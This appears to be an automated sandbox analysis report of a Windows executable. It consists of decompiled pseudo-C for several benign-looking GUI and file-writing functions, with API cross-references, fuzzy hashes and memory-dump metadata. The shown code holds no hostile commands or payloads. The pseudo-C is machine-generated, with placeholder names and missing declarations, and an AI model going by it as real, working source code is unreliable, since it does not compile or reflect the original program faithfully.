0x004057b9
0x0040579d
0x0040579d
0x004057ae
0x004057b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004057b7
0x004057ca
0x004057ce
0x004057ce
0x004057bb
0x004057bf

APIs

GetDlgItem.USER32 ref: 00405779
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64

Uniqueness

Uniqueness Score: -1.00%

Function 00402F8E, Relevance: 6.0, APIs: 4, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t16;
				intOrPtr* _t36;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t40 = __edx;
				_push(__ebx);
				_t47 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
				E00405700(_t16, E00406827(0x3b7), 1);
				E00405700(_t16, E00406827(0x3b8), 2);
				E0040300B(_t47);
				_t36 = _t47;
				_pop(_t48);
				_t49 = _t36;
				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
				 *((intOrPtr*)( *_t49 + 0x1c))();
				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
				return 0;
			}

0x00402f8e
0x00402f8e
0x00402f90
0x00402f99
0x00402faf
0x00402fc2
0x00402fcc
0x00402fdc
0x00402ff2
0x00402ffc
0x00403002
0x00403004
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00402FAC

Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

GetDlgItem.USER32 ref: 00402FBF
SetFocus.USER32(00000000), ref: 00402FC2
GetDlgItem.USER32 ref: 00402FCC

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
String ID:
API String ID: 2946568780-0
Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658

Uniqueness

Uniqueness Score: -1.00%

Function 0040877D, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v32775;
				char _v32776;

				E0040E340(0x8004, __ecx);
				_v32776 = 0;
				memset( &_v32775, 0, 0x7fff);
				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
			}

0x00408785
0x0040879c
0x004087a2
0x004087bf
0x004087eb

APIs

memset.MSVCRT ref: 004087A2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
strlen.MSVCRT ref: 004087D1
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C

Uniqueness

Uniqueness Score: -1.00%

Function 004087EC, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040E340(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004087f4
0x0040880b
0x00408811
0x0040882a
0x00408856

APIs

memset.MSVCRT ref: 00408811
WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
strlen.MSVCRT ref: 0040883C
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A5, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040D12C(__ecx, __ecx, __eflags);
					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
					L5:
					return E004015CE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E00405954(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, 0xffffff);
					SetTextColor(_a8, 0xc00000);
					return GetStockObject(0);
				}
			}

0x0040d4a5
0x0040d4ab
0x0040d4b1
0x0040d4b3
0x0040d4f8
0x0040d502
0x0040d509
0x00000000
0x0040d514
0x0040d4b8
0x00000000
0x0040d4c7
0x0040d4cc
0x0040d4da
0x0040d4e8
0x00000000
0x0040d4f0

APIs

Part of subcall function 00405954: memset.MSVCRT ref: 00405973
Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C

SetBkMode.GDI32(?,00000001), ref: 0040D4CC
SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
GetStockObject.GDI32(00000000), ref: 0040D4F0

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48

Uniqueness

Uniqueness Score: -1.00%

Function 00401482, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401482() {
				intOrPtr _t14;
				struct HWND__* _t17;
				intOrPtr _t25;
				void* _t26;

				if( *0x412394 == 2) {
					ExitProcess(1);
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if( *(_t26 + 0xc) == 0x110) {
					_t17 =  *(_t25 + 0x10);
					 *(_t26 + 0xc) = _t17;
					if( *0x412ecc != 0) {
						EnumChildWindows(_t17, E00406B34, 2);
						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
						E00405D0F( *(_t26 + 0xc), 0x400000);
					}
				}
				if( *((intOrPtr*)(_t25 + 8)) != 0) {
					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
				}
				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
				return E0040E2F1(_t14);
			}

0x0040148c
0x00401490
0x00401490
0x00401496
0x0040149a
0x004014a4
0x004014a6
0x004014a9
0x004014b3
0x004014c4
0x004014cc
0x004014d6
0x004014dc
0x004014b3
0x004014e1
0x004014eb
0x004014eb
0x004014f1
0x004014fd

APIs

ExitProcess.KERNEL32 ref: 00401490
EnumChildWindows.USER32 ref: 004014C4
EnumChildWindows.USER32 ref: 004014CC
SetWindowLongW.USER32 ref: 004014EB

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows$ExitLongProcessWindow
String ID:
API String ID: 2626381504-0
Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3B4, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C3B4(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x413258 == 0) {
					memcpy(0x412668,  *__eax, 0x50);
					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
					 *0x413258 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
					 *0x413258 =  *0x413258 & 0x00000000;
					 *0x412394 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x0040c3bc
0x0040c3be
0x0040c3ce
0x0040c3e0
0x0040c3ed
0x0040c407
0x0040c40d
0x0040c414
0x0040c41c
0x0040c3c0
0x0040c3c4
0x0040c3c4

APIs

memcpy.MSVCRT ref: 0040C3CE
memcpy.MSVCRT ref: 0040C3E0
GetModuleHandleW.KERNEL32(00000000), ref: 0040C3F3
DialogBoxParamW.USER32 ref: 0040C407

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00401712, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				void* _t16;

				_t16 = __edi;
				_t12 = __eax;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				GetClientRect(__eax, __edi + 0x24);
				E00403F55(__edi + 0x14);
				_t13 = GetWindow(GetWindow(_t12, 5), 0);
				while(1) {
					E0040169B(_t9, _t16);
					_t11 = GetWindow(_t13, 2);
					_t13 = _t11;
					if(_t13 == 0) {
						break;
					}
					_t9 = _t13;
				}
				return _t11;
			}

0x00401712
0x00401713
0x0040171b
0x0040171e
0x00401727
0x0040173c
0x00401742
0x00401744
0x0040174c
0x0040174e
0x00401752
0x00000000
0x00000000
0x00401740
0x00401740
0x00401756

APIs

GetClientRect.USER32 ref: 0040171E

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

GetWindow.USER32(?,00000005), ref: 00401737
GetWindow.USER32(00000000), ref: 0040173A

Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB

GetWindow.USER32(00000000,00000002), ref: 0040174C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rectfree$ClientPoints
String ID:
API String ID: 3078297017-0
Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B31A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
				char _v518;
				char _v1028;
				char _v1092;
				signed int _v1100;
				char _v1172;
				char* _v1176;
				intOrPtr _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				void* _t93;
				intOrPtr _t113;
				void* _t114;
				char* _t116;
				intOrPtr _t132;

				_t114 = __edx;
				_t112 = __ecx;
				_push(_t108);
				_t116 = __ecx;
				_v1176 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t142 = _a8 - 0x9c62;
					if(_a8 == 0x9c62) {
						_t108 = _t116;
						_t74 = E0040AD95(_t116, _t142);
					}
					_t143 = _a8 - 0x9c5f;
					if(_a8 == 0x9c5f) {
						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
					}
					if(_a8 == 0x9c5e) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
					}
					if(_a8 == 0x9c5c) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						E0040A3BF(_t116);
						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
					}
					if(_a8 == 0x9c42) {
						_t74 = DestroyWindow( *(_t116 + 0x208));
					}
					if(_a8 == 0x9c49) {
						_t108 = _t116;
						_t74 = E0040B0C2(_t116);
					}
					if(_a8 == 0x9c56) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E0040A6FF(_t116);
					}
					if(_a8 == 0x9c44) {
						_t74 = E00401BDC(_t116, 0x415);
					}
					if(_a8 == 0x9c43) {
						E0040133A( &_v1092);
						_v1092 = 0x410428;
						E00401000( &_v1028, _t112, 0x412290);
						_t108 =  &_v518;
						E00401000( &_v518, _t112, 0x4122c4);
						_t132 = _v1176;
						_push( *((intOrPtr*)(_t132 + 0x208)));
						_push( &_v1092);
						_t93 = 0x70;
						E0040152F(_t93);
						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
						_t74 = E00401357( &_v1100);
						_t116 = _t132;
					}
					_t154 = _a8 - 0x9c41;
					if(_a8 == 0x9c41) {
						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
					}
					if(_a8 != 0x9c47) {
						L27:
						__eflags = _a8 - 0x9c4f;
						if(_a8 != 0x9c4f) {
							L31:
							__eflags = _a8 - 0x9c48;
							if(__eflags == 0) {
								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
							}
							__eflags = _a8 - 0x9c45;
							if(_a8 == 0x9c45) {
								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
								__eflags = 0;
								E0040A1DC(0, _t112, _t116, 0);
								_t74 = E0040A6FF(_t116);
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
							}
							__eflags = _a8 - 0x9c65;
							if(__eflags == 0) {
								_t74 = E0040B054(_t116, __eflags);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								E0040133A( &_v1172);
								_v1100 = _v1100 & 0x00000000;
								_v1172 = 0x40f7a8;
								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
								_t82 = _v1184;
								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
								__eflags =  *((intOrPtr*)(_t113 + 0x224));
								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
										E0040B00A(_t82);
									}
								}
								_v1172 = 0x40f7a8;
								_t74 = E00401357( &_v1172);
								_t116 = _v1176;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c58;
							if(_a8 == 0x9c58) {
								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
							}
							goto L52;
						}
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
							goto L31;
						}
						_push(0xf000);
						_push(0x1000);
						goto L25;
					} else {
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x2000);
						L25:
						_push(0xffffffff);
						_t74 = E004077D8(_t88);
						goto L52;
					}
				} else {
					L52:
					return _t74;
				}
			}

0x0040b31a
0x0040b31a
0x0040b32b
0x0040b32e
0x0040b330
0x0040b334
0x0040b341
0x0040b347
0x0040b349
0x0040b34b
0x0040b34b
0x0040b350
0x0040b356
0x0040b35a
0x0040b35a
0x0040b365
0x0040b36d
0x0040b371
0x0040b375
0x0040b380
0x0040b380
0x0040b38b
0x0040b393
0x0040b397
0x0040b39b
0x0040b3a0
0x0040b3b3
0x0040b3b3
0x0040b3bf
0x0040b3c7
0x0040b3c7
0x0040b3d3
0x0040b3d5
0x0040b3d7
0x0040b3d7
0x0040b3e2
0x0040b3ea
0x0040b3ee
0x0040b3f2
0x0040b3f7
0x0040b3f7
0x0040b402
0x0040b40b
0x0040b40b
0x0040b416
0x0040b41c
0x0040b42d
0x0040b435
0x0040b43a
0x0040b446
0x0040b44b
0x0040b44f
0x0040b459
0x0040b45c
0x0040b45d
0x0040b468
0x0040b471
0x0040b476
0x0040b476
0x0040b478
0x0040b47e
0x0040b482
0x0040b482
0x0040b48d
0x0040b4bf
0x0040b4bf
0x0040b4c5
0x0040b4ed
0x0040b4ed
0x0040b4f3
0x0040b4f7
0x0040b4f7
0x0040b4fc
0x0040b502
0x0040b50a
0x0040b50e
0x0040b512
0x0040b517
0x0040b517
0x0040b51c
0x0040b522
0x0040b528
0x0040b528
0x0040b52d
0x0040b533
0x0040b539
0x0040b539
0x0040b53e
0x0040b544
0x0040b548
0x0040b548
0x0040b54d
0x0040b553
0x0040b559
0x0040b564
0x0040b56e
0x0040b588
0x0040b58d
0x0040b591
0x0040b597
0x0040b59e
0x0040b5a0
0x0040b5a7
0x0040b5a9
0x0040b5a9
0x0040b5a7
0x0040b5b2
0x0040b5b6
0x0040b5bb
0x0040b5bb
0x0040b5bf
0x0040b5c5
0x0040b5cd
0x0040b5cd
0x0040b5d2
0x0040b5d8
0x0040b5e0
0x0040b5e0
0x0040b5e5
0x0040b5eb
0x0040b5f9
0x0040b5f9
0x00000000
0x0040b5eb
0x0040b4c7
0x0040b4cd
0x0040b4d4
0x0040b4e8
0x00000000
0x0040b4e8
0x0040b4d6
0x0040b4db
0x00000000
0x0040b48f
0x0040b48f
0x0040b49c
0x0040b4ba
0x00000000
0x0040b4ba
0x0040b49e
0x0040b4a3
0x0040b4a8
0x0040b4a8
0x0040b4aa
0x00000000
0x0040b4aa
0x0040b5fe
0x0040b5fe
0x0040b604
0x0040b604

APIs

InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
DestroyWindow.USER32(?), ref: 0040B3C7

Strings

33@, xrefs: 0040B569

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyInvalidateRectWindow
String ID: 33@
API String ID: 724544332-1541121659
Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A4C2(void* __eax) {
				void* __ebx;
				void* __edi;
				short* __esi;
				void* _t24;
				int _t27;
				void* _t36;
				intOrPtr* _t43;

				_t36 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
					L11:
					E0040528C();
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						L15:
						goto L1;
					}
					__eflags =  *0x4131d4; // 0x1
					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
					if(__eflags == 0) {
						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
						 *0x4131d4 = 1;
					}
					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
					goto L15;
				} else {
					do {
						__ecx = __esi;
						__eax = E004065EE(__eax, __esi, L"/sort");
						__eflags = __eax;
						if(__eax != 0) {
